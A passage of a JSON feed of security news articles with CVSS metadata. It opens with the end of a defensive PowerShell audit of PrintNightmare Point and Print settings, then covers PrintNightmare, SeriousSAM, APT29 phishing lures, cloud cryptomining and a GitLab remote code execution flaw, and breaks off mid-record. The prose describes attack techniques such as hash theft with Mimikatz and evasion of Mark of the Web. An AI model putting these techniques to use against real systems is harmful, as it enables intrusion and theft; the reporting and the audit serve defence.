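    # the out-of-band update does not prevent exploitation.
    $noWarn = $pp.NoWarningNoElevationOnInstall
    $findings.Add((New-Finding 'NoWarningNoElevationOnInstall' (Show-Value $noWarn) $(if ($noWarn -eq 1) { 'VULNERABLE' } else { 'OK' }) 'Must be 0 or absent so driver installs prompt for elevation'))

    # UpdatePromptSettings = 1 or 2 suppresses the prompt on driver updates (companion value, same policy).
    $upd = $pp.UpdatePromptSettings
    $findings.Add((New-Finding 'UpdatePromptSettings' (Show-Value $upd) $(if ($upd -in 1, 2) { 'REVIEW' } else { 'OK' }) 'Should be 0 or absent'))

    # RestrictDriverInstallationToAdministrators (KB5005010): after the July 2021 updates the
    # default is admins-only; an explicit 0 re-opens print driver installation to ordinary users.
    $restrict = $pp.RestrictDriverInstallationToAdministrators
    $findings.Add((New-Finding 'RestrictDriverInstallationToAdministrators' (Show-Value $restrict) $(if ($restrict -eq 0) { 'VULNERABLE' } else { 'OK' }) 'Keep at 1 (or unset) so only administrators install print drivers'))

    return $findings
}

# Usage: list every finding, then exit non-zero if any check is VULNERABLE (useful in a scheduled job).
$results = Get-PrintNightmareExposure
$results | Format-Table -AutoSize
if ($results.Status -contains 'VULNERABLE') { exit 1 }
```

A REVIEW on the spooler row is expected on print servers and on workstations that genuinely need to print; the two VULNERABLE states are the insecure Point and Print configurations that, per CERT/CC and Microsoft's clarification, the update cannot defend, so those are the rows to act on first.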
", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-07-08T04:35:00", "type": "thn", "title": "Microsoft's Emergency Patch Fails to Fully Fix PrintNightmare RCE Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2021-07-09T09:52:49", "id": "THN:CAFA6C5C5A34365636215CFD7679FD50", "href": "https://thehackernews.com/2021/07/microsofts-emergency-patch-fails-to.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:39:23", "description": "Microsoft on Thursday officially confirmed that the \"**PrintNightmare**\" remote code execution (RCE) vulnerability affecting Windows Print Spooler is different from the 
issue the company addressed as part of its Patch Tuesday update released earlier this month, while warning that it has detected exploitation attempts targeting the flaw.\n\nThe company is tracking the security weakness under the identifier [CVE-2021-34527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>), and has assigned it a severity rating of 8.8 on the CVSS scoring system. All versions of Windows contain the vulnerable code and are susceptible to exploitation.\n\n\"A remote code execution vulnerability exists when the Windows Print Spooler service improperly performs privileged file operations,\" Microsoft said in its advisory. \"An attacker who successfully exploited this vulnerability could run arbitrary code with SYSTEM privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\"\n\n\"An attack must involve an authenticated user calling RpcAddPrinterDriverEx(),\" the Redmond-based firm added. 
When reached by The Hacker News, the company said it had nothing to share beyond the advisory.\n\nThe acknowledgment comes after researchers from Hong Kong-based cybersecurity company Sangfor [published](<https://thehackernews.com/2021/06/researchers-leak-poc-exploit-for.html>) a technical deep-dive of a Print Spooler RCE flaw to GitHub, along with fully working PoC code, before it was taken down just hours after it went up.\n\nThe disclosures also set off speculation and debate about whether the June patch does or does not protect against the RCE vulnerability, with the CERT Coordination Center [noting](<https://kb.cert.org/vuls/id/383432>) that \"while Microsoft has released an update for CVE-2021-1675, it is important to realize that this update does NOT protect Active Directory domain controllers, or systems that have Point and Print configured with the NoWarningNoElevationOnInstall option configured.\"\n\nCVE-2021-1675, originally classified as an elevation of privilege vulnerability and later revised to RCE, was remediated by Microsoft on June 8, 2021.\n\nThe company, in its advisory, noted that PrintNightmare is distinct from CVE-2021-1675 because the latter resolves a separate vulnerability in RpcAddPrinterDriverEx() and the attack vector is different.\n\nAs workarounds, Microsoft recommends that users disable the Print Spooler service or turn off inbound remote printing through Group Policy. To reduce the attack surface, and as an alternative to completely disabling printing, the company also advises checking membership and nested group membership, reducing membership as much as possible, or completely emptying the groups where possible.\n
", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-07-02T05:36:00", "type": "thn", "title": "Microsoft Warns of Critical \"PrintNightmare\" Flaw Being Exploited in the Wild", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2021-07-03T07:11:54", "id": "THN:9CE630030E0F3E3041E633E498244C8D", "href": "https://thehackernews.com/2021/07/microsoft-warns-of-critical.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:39:18", "description": "Microsoft Windows 10 and Windows 11 users are at risk of a new unpatched vulnerability that was recently disclosed publicly.\n\nAs we reported last week, the vulnerability \u2014 
[SeriousSAM](<https://thehackernews.com/2021/07/new-windows-and-linux-flaws-give.html>) \u2014 allows attackers with low-level permissions to access Windows system files to perform a Pass-the-Hash (and potentially Silver Ticket) attack.\n\nAttackers can exploit this vulnerability to obtain hashed passwords stored in the Security Account Manager (SAM) and Registry, and ultimately run arbitrary code with SYSTEM privileges.\n\nThe SeriousSAM vulnerability, tracked as **CVE-2021-36934**, exists in the default configuration of Windows 10 and Windows 11, specifically due to a setting that grants 'read' permission to the built-in Users group, which contains all local users.\n\nAs a result, local users in that group can read the SAM files and the Registry, where they can also view the hashes. Once the attacker has 'User' access, they can use a tool such as Mimikatz to gain access to the Registry or SAM, steal the hashes and convert them to passwords. Compromising domain users that way gives attackers elevated privileges on the network.\n\nBecause there is no official patch available yet from Microsoft, the best way to protect your environment from the SeriousSAM vulnerability is to implement hardening measures.\n\n## Mitigating SeriousSAM\n\nAccording to Dvir Goren, CTO at CalCom, there are three optional hardening measures:\n\n 1. **Delete all users from the built-in Users group** \u2014 this is a good place to start, but it won't protect you if Administrator credentials are stolen.\n 2. **Restrict SAM file and Registry permissions** \u2014 allow access only for Administrators. This, again, only solves part of the problem, since if an attacker steals Admin credentials you will still be exposed.\n 3. **Don't allow the storage of passwords and credentials for network authentication** \u2014 this rule is also recommended in the [CIS benchmarks](<https://www.calcomsoftware.com/cis-hardening-and-configuration-security-guide/>). 
Once this rule is implemented, no hash is stored in the SAM or registry, thereby mitigating this vulnerability completely.\n\nWhen using GPOs for implementation, make sure the following UI path is set to Enabled:\n\n> Computer Configuration\\Policies\\Windows Settings\\Security Settings\\Local Policies\\Security Options\\Network access: Do not allow storage of passwords and credentials for network authentication\n\n_Although the last recommendation offers a good solution for SeriousSAM, it may negatively impact your production if not properly tested before it is pushed. When this setting is enabled, applications that use scheduled tasks and need to store users' hashes locally will fail._\n\n## Mitigating SeriousSAM without risking damage to production\n\nThe following are Dvir's recommendations for mitigating the issue without causing downtime:\n\n 1. Set up a test environment that simulates your production environment. Simulate all possible dependencies of your network as accurately as you can.\n 2. Analyze the impact of this rule on your test environment. This way, if you have applications that rely on hashes that are stored locally, you'll know in advance and prevent production downtime.\n 3. Push the policy where possible. Make sure new machines are also hardened and that the configuration doesn't drift over time.\n\nThese three tasks are complex and require a lot of resources and in-house expertise. Therefore, Dvir's final recommendation is to [automate the entire hardening process](<https://www.calcomsoftware.com/server-hardening-suite/?utm_source=article&utm_medium=traffic&utm_campaign=hacker+news+seriousSAM&utm_id=hacker+news+seriousSAM>) to remove the need to perform stages 1, 2 and 3.
\n\nHere is what you will gain from a [Hardening Automation Tool](<https://www.calcomsoftware.com/best-hardening-tools/?utm_source=article&utm_medium=traffic&utm_campaign=hacker+news+seriousSAM&utm_id=hacker+news+seriousSAM>):\n\n * Automatically generate the most accurate possible impact analysis report \u2013 hardening automation tools 'learn' your production dependencies and report the potential impact of each policy rule to you.\n * Automatically enforce your policy across your entire production environment from a single point of control \u2013 using these tools, you won't need to do manual work, such as using GPOs. You can control and be certain that all your machines are hardened.\n * Maintain your compliance posture and monitor your machines in real time \u2013 hardening automation tools will monitor your compliance posture, alert on and remediate any unauthorized configuration changes, thereby preventing configuration drift.\n\n[Hardening automation tools](<https://www.calcomsoftware.com?utm_source=article&utm_medium=traffic&utm_campaign=hacker+news+seriousSAM&utm_id=hacker+news+seriousSAM>) will learn the dependencies directly from your network and automatically generate an accurate impact analysis report. A hardening automation tool will also help you orchestrate the implementation and monitoring process.\n
", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-26T11:21:00", "type": "thn", "title": "How to Mitigate Microsoft Windows 10, 11 SeriousSAM Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36934"], "modified": "2021-07-26T11:21:00", "id": "THN:777A53E3DACA2E9D76D60AB889CFD10F", "href": "https://thehackernews.com/2021/07/how-to-mitigate-microsoft-windows-10-11.html", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:37:35", "description": "The Russia-linked threat actor known as APT29 targeted European diplomatic missions and Ministries of Foreign Affairs as part of a 
series of spear-phishing campaigns mounted in October and November 2021.\n\nAccording to ESET's [T3 2021 Threat Report](<https://www.welivesecurity.com/2022/02/09/eset-threat-report-t32021/>) shared with The Hacker News, the intrusions paved the way for the deployment of Cobalt Strike Beacon on compromised systems, followed by leveraging the foothold to drop additional malware for gathering information about the hosts and other machines in the same network.\n\nAlso tracked under the names The Dukes, Cozy Bear, and Nobelium, the advanced persistent threat group is an infamous cyber-espionage group that has been active for more than a decade, with its attacks targeting Europe and the U.S., before it gained widespread attention for the [supply\u2010chain compromise](<https://thehackernews.com/2022/02/new-malware-used-by-solarwinds.html>) of SolarWinds, leading to further infections in several downstream entities, including U.S. government agencies in 2020.\n\nThe spear-phishing attacks commenced with a COVID-19-themed phishing email impersonating the Iranian Ministry of Foreign Affairs and containing an HTML attachment that, when opened, prompts the recipients to open or save what appears to be an ISO disk image file (\"Covid.iso\").\n\nShould the victim opt to open or download the file, \"a small piece of JavaScript decodes the ISO file, which is embedded directly in the HTML attachment.\" The disk image file, in turn, includes an HTML application that's executed using [mshta.exe](<https://www.mcafee.com/blogs/other-blogs/mcafee-labs/what-is-mshta-how-can-it-be-used-and-how-to-protect-against-it/>) to run a piece of PowerShell code that ultimately loads the Cobalt Strike Beacon onto the infected system.\n\nESET also 
characterized APT29's reliance on HTML and ISO disk images (or VHDX files) as a technique intended specifically to evade Mark of the Web ([MOTW](<https://docs.microsoft.com/en-us/previous-versions/windows/internet-explorer/ie-developer/compatibility/ms537628\\(v=vs.85\\)>)) protections, a security feature introduced by Microsoft to determine the origin of a file.\n\n\"An ISO disk image doesn't propagate the so-called Mark of the Web to the files inside the disk image,\" the researchers said. \"As such, and even if the ISO were downloaded from the internet, no warning would be displayed to the victim when the HTA is opened.\"\n\nUpon successfully gaining initial access, the threat actor delivered a variety of off-the-shelf tools to query the target's Active Directory ([AdFind](<https://www.joeware.net/freetools/tools/adfind/>)), execute commands on a remote machine using the SMB protocol ([Sharp-SMBExec](<https://github.com/checkymander/Sharp-SMBExec>)), and carry out reconnaissance ([SharpView](<https://github.com/tevora-threat/SharpView>)), as well as an exploit for a Windows privilege escalation flaw ([CVE-2021-36934](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36934>)) for follow-on attacks.\n\n\"Recent months have shown that The Dukes are a serious threat to western organizations, especially in the diplomatic sector,\" the researchers noted. \"They are very persistent, have good operational security, and they know how to create convincing phishing messages.\"\n
", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-09T10:46:00", "type": "thn", "title": "Russian APT Hackers Used COVID-19 Lures to Target European Diplomats", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36934"], "modified": "2022-02-10T03:04:57", "id": "THN:894809E1ADF0684644DCCDD97F76BC73", "href": "https://thehackernews.com/2022/02/russian-apt-hackers-used-covid-19-lures.html", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-23T06:21:32", "description": "A financially motivated threat actor of Indonesian origin has been observed leveraging Amazon Web 
Services (AWS) Elastic Compute Cloud (EC2) instances to carry out illicit crypto mining operations.\n\nCloud security company Permiso's P0 Labs, which first detected the group in November 2021, has assigned it the moniker **GUI-vil** (pronounced Goo-ee-vil).\n\n\"The group displays a preference for Graphical User Interface (GUI) tools, specifically S3 Browser (version 9.5.5) for their initial operations,\" the company said in a [report](<https://permiso.io/blog/s/unmasking-guivil-new-cloud-threat-actor/>) shared with The Hacker News. \"Upon gaining AWS Console access, they conduct their operations directly through the web browser.\"\n\nAttack chains mounted by GUI-vil entail obtaining initial access by weaponizing AWS keys in publicly exposed source code repositories on GitHub or scanning for GitLab instances that are vulnerable to remote code execution flaws (e.g., [CVE-2021-22205](<https://nvd.nist.gov/vuln/detail/CVE-2021-22205>)).\n\nA successful ingress is followed by privilege escalation and internal reconnaissance to review all available S3 buckets and determine the services that are accessible via the AWS web console.\n\nA notable aspect of the threat actor's modus operandi is its attempt to blend in and persist within the victim environment by creating new users that conform to the same naming convention and ultimately meet its objectives.\n\n\"GUI-vil will also create access keys for the new identities they are creating so they can continue usage of [S3 Browser](<https://s3browser.com/>) with these new users,\" P0 Labs researchers Ian Ahl and Daniel Bohannon explained.\n\nAlternatively, the group has also been spotted [creating login 
profiles](<https://s3browser.com/iam-aws-identity-and-access-management.aspx>) for existing users that do not have them so as to enable access to the AWS console without raising red flags.\n\nGUI-vil's links to Indonesia stem from the fact that the source IP addresses associated with the activities are linked to two Autonomous System Numbers (ASNs) located in the Southeast Asian country.\n\n\"The group's primary mission, financially driven, is to create EC2 instances to facilitate their crypto mining activities,\" the researchers said. \"In many cases the profits they make from crypto mining are just a sliver of the expense the victim organizations have to pay for running the EC2 instances.\"\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2023-05-22T16:05:00", "type": "thn", "title": "Indonesian Cybercriminals Exploit AWS for Profitable Crypto Mining Operations", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, 
"obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22205"], "modified": "2023-05-23T04:44:35", "id": "THN:E419B1DF43D0213BA108DD837F6E33F7", "href": "https://thehackernews.com/2023/05/indonesian-cybercriminals-exploit-aws.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:38:08", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEgly3ynZqRUgIk8eaQI3ACZ6rpkFw0RZ40CXxAvusm_imwL1dgvJ3jiKVwoxFqYRtOL12IrCe1580PpFo8dxP3nXUpVMg2PSt75raRc6Aliqp3juIRilqztTEQSSdBnsY7tmAS_RFHr847lXP9JcajCCgGXlhhR-J5PNTyorMZ3a-xlC5UcNBF_EfsQ>)\n\nA now-patched critical remote code execution (RCE) vulnerability in GitLab's web interface has been detected as actively exploited in the wild, cybersecurity researchers warn, rendering a large number of internet-facing GitLab instances susceptible to attacks.\n\nTracked as [CVE-2021-22205](<https://nvd.nist.gov/vuln/detail/CVE-2021-22205>), the issue relates to an improper validation of user-provided images that results in arbitrary code execution. 
The vulnerability, which affects all versions starting from 11.9, has since been [addressed](<https://about.gitlab.com/releases/2021/04/14/security-release-gitlab-13-10-3-released/>) by GitLab on April 14, 2021 in versions 13.8.8, 13.9.6, and 13.10.3.\n\nIn one of the real-world attacks [detailed](<https://security.humanativaspa.it/gitlab-ce-cve-2021-22205-in-the-wild/>) by HN Security last month, two user accounts with admin privileges were registered on a publicly accessible GitLab server belonging to an unnamed customer by exploiting the aforementioned flaw to upload a malicious payload \"image,\" leading to remote execution of commands that granted the rogue accounts elevated permissions.\n\nAttacks exploiting the vulnerability are said to have begun as early as June this year, coinciding with the public availability of proof-of-concept (PoC) code required to breach the servers.\n\nAlthough the flaw was initially deemed to be a case of authenticated RCE and assigned a CVSS score of 9.9, the severity rating was revised to 10.0 on September 21, 2021 owing to the fact that it can be triggered by unauthenticated threat actors as well.\n\n\"Despite the tiny move in CVSS score, a change from authenticated to unauthenticated has big implications for defenders,\" cybersecurity firm Rapid7 [said](<https://www.rapid7.com/blog/post/2021/11/01/gitlab-unauthenticated-remote-code-execution-cve-2021-22205-exploited-in-the-wild/>) in an alert published Monday.\n\nTelemetry data gathered by the Boston-based company show that of the 60,000 internet-facing GitLab installations, only 21% of the instances are fully patched against the issue, with another 50% still vulnerable to RCE attacks despite the fact that the patches have been up 
for grabs for more than six months.\n\nIn light of the unauthenticated nature of this vulnerability, exploitation activity is expected to increase, making it critical that GitLab users update to the latest version as soon as possible. \"In addition, ideally, GitLab should not be an internet facing service,\" the researchers said. \"If you need to access your GitLab from the internet, consider placing it behind a VPN.\"\n\nAdditional technical analysis related to the vulnerability can be accessed [here](<https://attackerkb.com/topics/D41jRUXCiJ/cve-2021-22205/rapid7-analysis>).\n\n**_Update:_** Threat actors are now actively exploiting the security flaw to co-opt unpatched GitLab servers into a botnet and launch distributed denial of service (DDoS) attacks, with some in excess of 1 terabit per second (Tbps), [according](<https://twitter.com/menscher/status/1456057918562861059>) to Google security reliability engineer Damian Menscher.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-11-02T10:03:00", "type": "thn", "title": "Alert! 
Hackers Exploiting GitLab Unauthenticated RCE Flaw in the Wild", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22205"], "modified": "2021-11-05T05:40:52", "id": "THN:AF03AC0B7E2ACC4689E02BDC9E87A844", "href": "https://thehackernews.com/2021/11/alert-hackers-exploiting-gitlab.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-06T07:58:10", "description": "Cybersecurity researchers have detailed the various measures ransomware actors have taken to obscure their true identity online as well as the hosting location of their web server infrastructure.\n\n\"Most ransomware operators use hosting providers outside their country of origin (such as Sweden, Germany, and Singapore) to host their ransomware operations sites,\" Cisco Talos researcher Paul Eubanks [said](<https://blog.talosintelligence.com/2022/06/de-anonymizing-ransomware-domains-on.html>). 
\"They use VPS hop-points as a proxy to hide their true location when they connect to their ransomware web infrastructure for remote administration tasks.\"\n\nAlso prominent are the use of the TOR network and DNS proxy registration services to provide an added layer of anonymity for their illegal operations.\n\nBut by taking advantage of the threat actors' operational security missteps and other techniques, the cybersecurity firm disclosed last week that it was able to identify TOR hidden services hosted on public IP addresses, some of which are previously unknown infrastructure associated with [DarkAngels](<https://blog.cyble.com/2022/05/06/rebranded-babuk-ransomware-in-action-darkangels-ransomware-performs-targeted-attack/>), [Snatch](<https://malpedia.caad.fkie.fraunhofer.de/details/win.snatch>), [Quantum](<https://www.cybereason.com/blog/cybereason-vs.-quantum-locker-ransomware>), and [Nokoyawa](<https://malpedia.caad.fkie.fraunhofer.de/details/win.nokoyawa>) ransomware groups.\n\nWhile ransomware groups are known to rely on the dark web to conceal their illicit activities ranging from leaking stolen data to negotiating payments with victims, Talos disclosed that it was able to identify \"public IP addresses hosting the same threat actor infrastructure as those on the dark web.\"\n\n\"The methods we used to identify the public internet IPs involved matching threat actors' [self-signed] [TLS certificate](<https://www.digicert.com/tls-ssl/tls-ssl-certificates>) serial numbers and page elements with those indexed on the public internet,\" Eubanks said.\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjaV9wVlzzeADW3plTap4jOh9fqaG1M5Q8q7q-pX6vbN6EAWqHqnEEvq-nA0yW2N64kchUyacQRbSQXnYk0i2qcd2Lxjiu4alpeum5cu6QCPMBvjt90TSKl-7opy4d0YCn8MX_tPYh7B04Vidh2gZfgYJXxKGevp9NbNa8lZg-DQGZXl7xjDrvwfK89/s728-e100/cert.jpg>)\n\nBesides TLS certificate matching, a second method employed to uncover the adversaries' clear web infrastructures entailed checking the 
favicons associated with the darknet websites against the public internet using web crawlers like Shodan.\n\nIn the case of [Nokoyawa](<https://www.fortinet.com/blog/threat-research/nokoyawa-variant-catching-up>), a new Windows ransomware strain that appeared earlier this year and shares substantial code similarities with Karma, the site hosted on the TOR hidden service was found to harbor a directory traversal flaw that enabled the researchers to access the \"[/var/log/auth.log](<https://help.ubuntu.com/community/LinuxLogFiles>)\" file used to capture user logins.\n\nThe findings demonstrate that not only are the criminal actors' leak sites accessible to any user on the internet, but other infrastructure components, including identifying server data, were also left exposed, effectively making it possible to obtain the login locations used to administer the ransomware servers.\n\nFurther analysis of the successful root user logins showed that they originated from two IP addresses, 5.230.29[.]12 and 176.119.0[.]195, the former of which belongs to GHOSTnet GmbH, a hosting provider that offers Virtual Private Server (VPS) services.\n\n\"176.119.0[.]195 however belongs to AS58271 which is listed under the name Tyatkova Oksana Valerievna,\" Eubanks noted. 
\"It's possible the operator forgot to use the German-based VPS for obfuscation and logged into a session with this web server directly from their true location at 176.119.0[.]195.\"\n\n### LockBit adds a bug bounty program to its revamped RaaS operation\n\nThe development comes as the operators of the emerging [Black Basta](<https://thehackernews.com/2022/06/cybersecurity-experts-warn-of-emerging.html>) ransomware [expanded](<https://www.trendmicro.com/en_us/research/22/f/black-basta-ransomware-operators-expand-their-attack-arsenal-wit.html>) their attack arsenal by using QakBot for initial access and lateral movement, and taking advantage of the PrintNightmare vulnerability ([CVE-2021-34527](<https://thehackernews.com/2021/07/microsoft-warns-of-new-unpatched.html>)) to conduct privileged file operations.\n\nWhat's more, the LockBit ransomware gang last week [announced](<https://twitter.com/vxunderground/status/1541156954214727685>) the release of LockBit 3.0 with the message \"Make Ransomware Great Again!,\" in addition to launching their own Bug Bounty program, offering rewards ranging between $1,000 and $1 million for identifying security flaws and \"brilliant ideas\" to improve its software.\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjwyY9trUR2Z6AyEmJ7Zm0vLXiYawK0UpJysKcAGEK4eyTyY-cibr3Vgf7ATbqzCSSUqeTQTR_TQkAtJ5XPpqiw8JZnWQg1KTo0ktefqdmaqc8XFgVp27DzMej76ut1FMMJ8h0r2U-UR72FNxbM4_q9ph1cAzMroG_05T9as1lDjAVK34y53Er0koFQ/s728-e100/bug.jpg>)\n\n\"The release of LockBit 3.0 with the introduction of a bug bounty program is a formal invitation to cybercriminals to help assist the group in its quest to remain at the top,\" Satnam Narang, senior staff research engineer at Tenable, said in a statement shared with The Hacker News.\n\n\"A key focus of the bug bounty program are defensive measures: Preventing security researchers and law enforcement from finding bugs in its leak sites or ransomware, identifying ways that members including the affiliate 
program boss could be doxed, as well as finding bugs within the messaging software used by the group for internal communications and the Tor network itself.\"\n\n\"The threat of being doxed or identified signals that law enforcement efforts are clearly a great concern for groups like LockBit. Finally, the group is planning to offer Zcash as a payment option, which is significant, as Zcash is harder to trace than Bitcoin, making it harder for researchers to keep tabs on the group's activity.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-05T07:06:00", "type": "thn", "title": "Researchers Share Techniques to Uncover Anonymized Ransomware Sites on Dark Web", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2022-07-06T06:06:49", "id": "THN:849B821D3503018DA38FAFFBC34DAEBB", "href": 
